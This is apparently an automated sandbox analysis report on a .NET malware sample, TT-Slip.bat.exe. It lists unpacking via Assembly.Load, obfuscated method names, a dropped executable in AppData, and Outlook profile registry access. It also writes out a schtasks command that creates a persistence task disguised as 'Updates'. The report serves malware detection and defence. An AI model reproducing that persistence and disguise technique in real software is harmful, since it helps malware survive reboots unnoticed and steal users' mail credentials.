Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\compact.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: TT-Slip.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: TT-Slip.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: compact.pdbGCTL source: TT-Slip.bat.exe, 00000009.00000002.2375460605.0000000001108000.00000004.00000020.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000010.00000002.4514950103.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ISsofSsdrAsp.exe, 00000010.00000000.2300784640.000000000084E000.00000002.00000001.01000000.0000000D.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4514440138.000000000084E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: TT-Slip.bat.exe, 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4515629047.0000000003190000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4515629047.000000000332E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000003.2375273108.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000011.00000003.2377019093.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: TT-Slip.bat.exe, TT-Slip.bat.exe, 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4515629047.0000000003190000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4515629047.000000000332E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000003.2375273108.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000011.00000003.2377019093.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compact.pdb source: TT-Slip.bat.exe, 00000009.00000002.2375460605.0000000001108000.00000004.00000020.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000010.00000002.4514950103.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, QdJdI5bwiiEG3edPt8.cs	.Net Code: xElRNM0SQ5 System.Reflection.Assembly.Load(byte[])
Source: 0.2.TT-Slip.bat.exe.5090000.7.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, QdJdI5bwiiEG3edPt8.cs	.Net Code: xElRNM0SQ5 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_00B0E938 push esp; retf	0_2_00B0E939
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_00B0F4D0 pushad ; iretd	0_2_00B0F4D1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_00B0DB64 push esp; ret	0_2_00B0DB6D
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00418141 push eax; ret	9_2_00418149
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00407954 push esp; retf	9_2_00407956
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_004021C8 push 9A9BCBBFh; retf	9_2_004021CD
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0041426D push esp; iretd	9_2_0041426E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00407A02 push esp; retf	9_2_00407A07
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0041E2FA push edi; iretd	9_2_0041E33C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0041E303 push edi; iretd	9_2_0041E33C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00418421 push esp; iretd	9_2_0041843F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00411CC2 push eax; retf	9_2_00411CC6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_004035D0 push eax; ret	9_2_004035D2
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00413E00 push es; retn 4BB0h	9_2_00413DFF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0166B008 push es; iretd	9_2_0166B009
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01661328 push eax; iretd	9_2_01661369
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0166225F pushad ; ret	9_2_016627F9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016627FA pushad ; ret	9_2_016627F9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01669939 push es; iretd	9_2_01669940
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016909AD push ecx; mov dword ptr [esp], ecx	9_2_016909B6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0166283D push eax; iretd	9_2_01662858
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_0306E938 push esp; retf	10_2_0306E939
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_0306F4A8 pushad ; iretd	10_2_0306F4D1
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_0306DB64 push esp; ret	10_2_0306DB6D
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_075A028A pushad ; retf	10_2_075A0291
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010BC54F push 8B010467h; ret	14_2_010BC554
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010BC54D pushfd ; ret	14_2_010BC54E
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010709AD push ecx; mov dword ptr [esp], ecx	14_2_010709B6
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010BC9D7 push edi; ret	14_2_010BC9D9
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0104134E push eax; iretd	14_2_01041369
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01041FEC push eax; iretd	14_2_01041FED

Source: TT-Slip.bat.exe	Static PE information: section name: .text entropy: 7.979128600620661
Source: IiIseKTckjhZgQ.exe.0.dr	Static PE information: section name: .text entropy: 7.979128600620661

Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, GvupBQeIX5lGaIoZ2q.cs	High entropy of concatenated method names: 'clJq42oJyL', 'Oosqi2TnZ4', 'lL1qSsfn0f', 'VLbqxIZQaU', 'JGKqcu8mje', 'AnsqarJkpe', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, bnIWIolVls9Zyob0Op.cs	High entropy of concatenated method names: 'yBPuwTslf2', 'ycSuLZw0m5', 'C17uNJE1HJ', 'WFjuWODLPG', 'yULufwPtgK', 'r9BuFeBTGi', 'rWPulBbXX2', 'i60uPGNVVF', 'apFu0MJu4b', 'O0Ku9p7ntP'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, noSu6anqwMXRKpPiMQ.cs	High entropy of concatenated method names: 'Bw6rhRMQqg', 'sKHrG1uKHn', 'Ju6rMINRa3', 'Uq0ruBSKRs', 'BXarHQO6rU', 'OBeMyH0gaE', 'l6tMUChwOw', 'YpvMkLUBhN', 'JJlMdui5DA', 's9dM8SIJ69'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, N8Q25JcKeZW2S8FivR.cs	High entropy of concatenated method names: 'IPOGcDMItQ', 'X5KGVOqVhD', 'VaOGoIE0jE', 'd8YG5LG7hp', 'qRZGyxjXL8', 'KdxGUOIVAe', 'EOtGk7mGui', 'rC1GdX9WZD', 'YviG8yIiuG', 'gCtGJWOOhw'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, bFtNOxxGEF85u9SnBT.cs	High entropy of concatenated method names: 'yI6EuHu5eJ', 'cM8EH89VRk', 'WCeEekr7nP', 'zDgE6lcvHu', 'GJ1EBJkYd6', 'n4BEXiQ4MI', 'IN91PntehV6pNFx4cg', 'Vh2HYXE66MHjlerpE7', 'Qg7EEZFvEA', 'XEZEph63Bh'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, q7Ac5ED52J65WnkHAw.cs	High entropy of concatenated method names: 'CYTNZOYuS', 'vTFW8ZiUI', 'HW9FFsZ94', 'dE9lEL36t', 'RVf0L7gl3', 'LPZ9TqSD5', 'FkjUVQiOwsFx5al3HT', 'gJi4Yf2gSci6SLQkNH', 'rlOqfCMBg', 'WmXnqmbyq'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, RY38rtJCy6MtIFqDIp.cs	High entropy of concatenated method names: 'ToString', 'vDYX3NJ3wV', 'U2mXisIIFl', 'b0xXSobRHc', 'JANXxUr9wG', 'LRQXahxqdo', 'vEhX7qaXfh', 'YjXXKSOnrv', 'pScXZfFYRj', 'LwJXCoybrp'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, Fh397SyB4i7t1DmNT5.cs	High entropy of concatenated method names: 'Bl9BtTju21', 'bB7BgF5AJP', 'c8HBcgxQg8', 'CCCBVMVkQJ', 'NDTBiX8Qpo', 'cLIBSehAS1', 'QZkBxK1qAm', 'vwTBaXAYgP', 'UKoB7i2ion', 'bC2BKfl8qf'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, uAEJQkddl9uMo4dpJ5.cs	High entropy of concatenated method names: 'FkVum08xRe', 'hr0uQHCMD1', 'LtBurQfF4H', 'mT1rJ7sT4R', 'SJrrzLHi1U', 'EQMuDF0ygY', 'GQtuEHOll5', 'AESuYAQ9mx', 'Qw3upxluAq', 'ItxuRyYJBY'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, dXptwZYBE9QTDZ6KgZ.cs	High entropy of concatenated method names: 'nipIdeuLcG', 'EUlIJef1oq', 'yV0qDwhTIk', 'X11qEu5uN6', 'iLQI33Ljla', 'qC1IgvyJOc', 'y1aIjEuJl0', 'caHIceR8tU', 'lCNIVtHCi1', 'IikIoZEJut'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, pgZNe0W7DLvL1CEVUVo.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zOHncKFmgT', 'zj9nVe03Ap', 'h2rnowXJj0', 'FvSn5OHvQl', 'z0ynyifCLW', 'UM6nUKSWuV', 'fF7nkgPrKW'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, hs1jO1fWUHikUEQi3V.cs	High entropy of concatenated method names: 'g9xMfhotyc', 'jXBMl4cEOk', 'PhWQSwEI0x', 'kRIQxSTpPt', 'CbqQaxZqY4', 'GcRQ7EXmWm', 'QtnQKjMTW6', 'qh2QZo8H0L', 'v2XQCuA1Kb', 'HuEQtPeNVd'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, QdJdI5bwiiEG3edPt8.cs	High entropy of concatenated method names: 'XavphTuTBA', 'Nd2pmO9F3V', 'B9jpGoqqqG', 'SkcpQpjQgS', 'fFspMGxMjX', 'rLNprQX2Wn', 'Q0bpujxVSg', 'xFVpHQWlUL', 'ftppsn6KUx', 'fgepekO2DR'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, xZyudfFMV18vF0fTfw.cs	High entropy of concatenated method names: 'idlQWywQjP', 'BaeQFcEKqF', 'aGZQPJ41PG', 'tNaQ0yfB1g', 'xYiQBvUXVa', 'jd0QXuFtME', 'ylOQIkrw1V', 'btEQqP465u', 'mODQT7bD1H', 'h83QnKmTNo'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, vUVDIiQMstXaa34g2C.cs	High entropy of concatenated method names: 'Dispose', 'Q78E893dPA', 'DHmYi32lbO', 'tB2vve6L81', 'CfjEJ9wynB', 'Mj2EzSUcdA', 'ProcessDialogKey', 'NfIYDveq6h', 'ftwYEZiKgX', 'G5QYY3FpQq'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, MsuHTJLoHxQqrjUMHq.cs	High entropy of concatenated method names: 'fOU2Pna4s3', 'nnl20S8YAp', 'a90240RcaB', 'eIg2iLWHN8', 'PeT2xHdipB', 'DpS2akWJMv', 'Ysq2K8jfPG', 'yNK2ZTbvoF', 'nQb2tk2oA3', 'rri23eTCYc'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, odGYm7zmGQmTX2W5r6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GmGT25hmF7', 'DKRTBi6ehl', 'MgXTXkfs85', 'FIUTI8ALNR', 'Is8Tq3vcrZ', 'eypTTl5hIC', 'QjiTnaJmrv'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, qnlrDy0lno3TJL9Hv7.cs	High entropy of concatenated method names: 'EMdTEdpKHS', 'OrXTpdhISJ', 'wEGTRMm4cm', 'aXFTmYNETC', 'h8kTGPWktr', 'TsVTMB1pFk', 'KL9TreXRDZ', 'nFyqkwmZbv', 'MjIqdjZ8Le', 'Fmdq8KrDNb'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, SKUQ70WPwKMornKkCwx.cs	High entropy of concatenated method names: 'QQMTweJtNL', 'tLTTLlmahu', 's24TNHwe4b', 'PI3TWqNKRh', 'XZqTfDayPI', 'eK7TFXq781', 'NkHTljcP83', 'SZ8TPm7I1P', 'QZ2T0OnDTx', 'SqfT9ZRsWs'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, wv9ogAofMQccmCMPi9.cs	High entropy of concatenated method names: 's3eqmCrA5x', 'OSLqGevrVT', 'DGfqQKCe8w', 'TdfqM1evOP', 'aCZqrxBUgy', 'jQSqujd95V', 'ugBqHPDGIZ', 'IaIqsAIFuH', 'tIFqe90TXI', 'JpBq6HOIrC'
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, jihi0vWWKnscKHLyrw7.cs	High entropy of concatenated method names: 'ToString', 'n6GnpbD2Cg', 'oaVnRIqLnd', 'oU6nhN0ZW6', 'JspnmuG4PS', 'ivbnGugcuk', 'jQjnQ3fhTS', 'RXqnMBjqFU', 'HywmxKbtD5YcLQr3Vrf', 'dYkQIKbEjVGmskom87L'
Source: 0.2.TT-Slip.bat.exe.5090000.7.raw.unpack, K4VVbTCGN4q2c8lCCj.cs	High entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
Source: 0.2.TT-Slip.bat.exe.5090000.7.raw.unpack, q1bUrWhd8NtMR4Tat2.cs	High entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
Source: 0.2.TT-Slip.bat.exe.5090000.7.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	High entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, GvupBQeIX5lGaIoZ2q.cs	High entropy of concatenated method names: 'clJq42oJyL', 'Oosqi2TnZ4', 'lL1qSsfn0f', 'VLbqxIZQaU', 'JGKqcu8mje', 'AnsqarJkpe', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, bnIWIolVls9Zyob0Op.cs	High entropy of concatenated method names: 'yBPuwTslf2', 'ycSuLZw0m5', 'C17uNJE1HJ', 'WFjuWODLPG', 'yULufwPtgK', 'r9BuFeBTGi', 'rWPulBbXX2', 'i60uPGNVVF', 'apFu0MJu4b', 'O0Ku9p7ntP'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, noSu6anqwMXRKpPiMQ.cs	High entropy of concatenated method names: 'Bw6rhRMQqg', 'sKHrG1uKHn', 'Ju6rMINRa3', 'Uq0ruBSKRs', 'BXarHQO6rU', 'OBeMyH0gaE', 'l6tMUChwOw', 'YpvMkLUBhN', 'JJlMdui5DA', 's9dM8SIJ69'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, N8Q25JcKeZW2S8FivR.cs	High entropy of concatenated method names: 'IPOGcDMItQ', 'X5KGVOqVhD', 'VaOGoIE0jE', 'd8YG5LG7hp', 'qRZGyxjXL8', 'KdxGUOIVAe', 'EOtGk7mGui', 'rC1GdX9WZD', 'YviG8yIiuG', 'gCtGJWOOhw'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, bFtNOxxGEF85u9SnBT.cs	High entropy of concatenated method names: 'yI6EuHu5eJ', 'cM8EH89VRk', 'WCeEekr7nP', 'zDgE6lcvHu', 'GJ1EBJkYd6', 'n4BEXiQ4MI', 'IN91PntehV6pNFx4cg', 'Vh2HYXE66MHjlerpE7', 'Qg7EEZFvEA', 'XEZEph63Bh'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, q7Ac5ED52J65WnkHAw.cs	High entropy of concatenated method names: 'CYTNZOYuS', 'vTFW8ZiUI', 'HW9FFsZ94', 'dE9lEL36t', 'RVf0L7gl3', 'LPZ9TqSD5', 'FkjUVQiOwsFx5al3HT', 'gJi4Yf2gSci6SLQkNH', 'rlOqfCMBg', 'WmXnqmbyq'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, RY38rtJCy6MtIFqDIp.cs	High entropy of concatenated method names: 'ToString', 'vDYX3NJ3wV', 'U2mXisIIFl', 'b0xXSobRHc', 'JANXxUr9wG', 'LRQXahxqdo', 'vEhX7qaXfh', 'YjXXKSOnrv', 'pScXZfFYRj', 'LwJXCoybrp'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, Fh397SyB4i7t1DmNT5.cs	High entropy of concatenated method names: 'Bl9BtTju21', 'bB7BgF5AJP', 'c8HBcgxQg8', 'CCCBVMVkQJ', 'NDTBiX8Qpo', 'cLIBSehAS1', 'QZkBxK1qAm', 'vwTBaXAYgP', 'UKoB7i2ion', 'bC2BKfl8qf'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, uAEJQkddl9uMo4dpJ5.cs	High entropy of concatenated method names: 'FkVum08xRe', 'hr0uQHCMD1', 'LtBurQfF4H', 'mT1rJ7sT4R', 'SJrrzLHi1U', 'EQMuDF0ygY', 'GQtuEHOll5', 'AESuYAQ9mx', 'Qw3upxluAq', 'ItxuRyYJBY'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, dXptwZYBE9QTDZ6KgZ.cs	High entropy of concatenated method names: 'nipIdeuLcG', 'EUlIJef1oq', 'yV0qDwhTIk', 'X11qEu5uN6', 'iLQI33Ljla', 'qC1IgvyJOc', 'y1aIjEuJl0', 'caHIceR8tU', 'lCNIVtHCi1', 'IikIoZEJut'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, pgZNe0W7DLvL1CEVUVo.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zOHncKFmgT', 'zj9nVe03Ap', 'h2rnowXJj0', 'FvSn5OHvQl', 'z0ynyifCLW', 'UM6nUKSWuV', 'fF7nkgPrKW'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, hs1jO1fWUHikUEQi3V.cs	High entropy of concatenated method names: 'g9xMfhotyc', 'jXBMl4cEOk', 'PhWQSwEI0x', 'kRIQxSTpPt', 'CbqQaxZqY4', 'GcRQ7EXmWm', 'QtnQKjMTW6', 'qh2QZo8H0L', 'v2XQCuA1Kb', 'HuEQtPeNVd'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, QdJdI5bwiiEG3edPt8.cs	High entropy of concatenated method names: 'XavphTuTBA', 'Nd2pmO9F3V', 'B9jpGoqqqG', 'SkcpQpjQgS', 'fFspMGxMjX', 'rLNprQX2Wn', 'Q0bpujxVSg', 'xFVpHQWlUL', 'ftppsn6KUx', 'fgepekO2DR'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, xZyudfFMV18vF0fTfw.cs	High entropy of concatenated method names: 'idlQWywQjP', 'BaeQFcEKqF', 'aGZQPJ41PG', 'tNaQ0yfB1g', 'xYiQBvUXVa', 'jd0QXuFtME', 'ylOQIkrw1V', 'btEQqP465u', 'mODQT7bD1H', 'h83QnKmTNo'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, vUVDIiQMstXaa34g2C.cs	High entropy of concatenated method names: 'Dispose', 'Q78E893dPA', 'DHmYi32lbO', 'tB2vve6L81', 'CfjEJ9wynB', 'Mj2EzSUcdA', 'ProcessDialogKey', 'NfIYDveq6h', 'ftwYEZiKgX', 'G5QYY3FpQq'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, MsuHTJLoHxQqrjUMHq.cs	High entropy of concatenated method names: 'fOU2Pna4s3', 'nnl20S8YAp', 'a90240RcaB', 'eIg2iLWHN8', 'PeT2xHdipB', 'DpS2akWJMv', 'Ysq2K8jfPG', 'yNK2ZTbvoF', 'nQb2tk2oA3', 'rri23eTCYc'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, odGYm7zmGQmTX2W5r6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GmGT25hmF7', 'DKRTBi6ehl', 'MgXTXkfs85', 'FIUTI8ALNR', 'Is8Tq3vcrZ', 'eypTTl5hIC', 'QjiTnaJmrv'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, qnlrDy0lno3TJL9Hv7.cs	High entropy of concatenated method names: 'EMdTEdpKHS', 'OrXTpdhISJ', 'wEGTRMm4cm', 'aXFTmYNETC', 'h8kTGPWktr', 'TsVTMB1pFk', 'KL9TreXRDZ', 'nFyqkwmZbv', 'MjIqdjZ8Le', 'Fmdq8KrDNb'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, SKUQ70WPwKMornKkCwx.cs	High entropy of concatenated method names: 'QQMTweJtNL', 'tLTTLlmahu', 's24TNHwe4b', 'PI3TWqNKRh', 'XZqTfDayPI', 'eK7TFXq781', 'NkHTljcP83', 'SZ8TPm7I1P', 'QZ2T0OnDTx', 'SqfT9ZRsWs'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, wv9ogAofMQccmCMPi9.cs	High entropy of concatenated method names: 's3eqmCrA5x', 'OSLqGevrVT', 'DGfqQKCe8w', 'TdfqM1evOP', 'aCZqrxBUgy', 'jQSqujd95V', 'ugBqHPDGIZ', 'IaIqsAIFuH', 'tIFqe90TXI', 'JpBq6HOIrC'
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, jihi0vWWKnscKHLyrw7.cs	High entropy of concatenated method names: 'ToString', 'n6GnpbD2Cg', 'oaVnRIqLnd', 'oU6nhN0ZW6', 'JspnmuG4PS', 'ivbnGugcuk', 'jQjnQ3fhTS', 'RXqnMBjqFU', 'HywmxKbtD5YcLQr3Vrf', 'dYkQIKbEjVGmskom87L'

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

File created: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
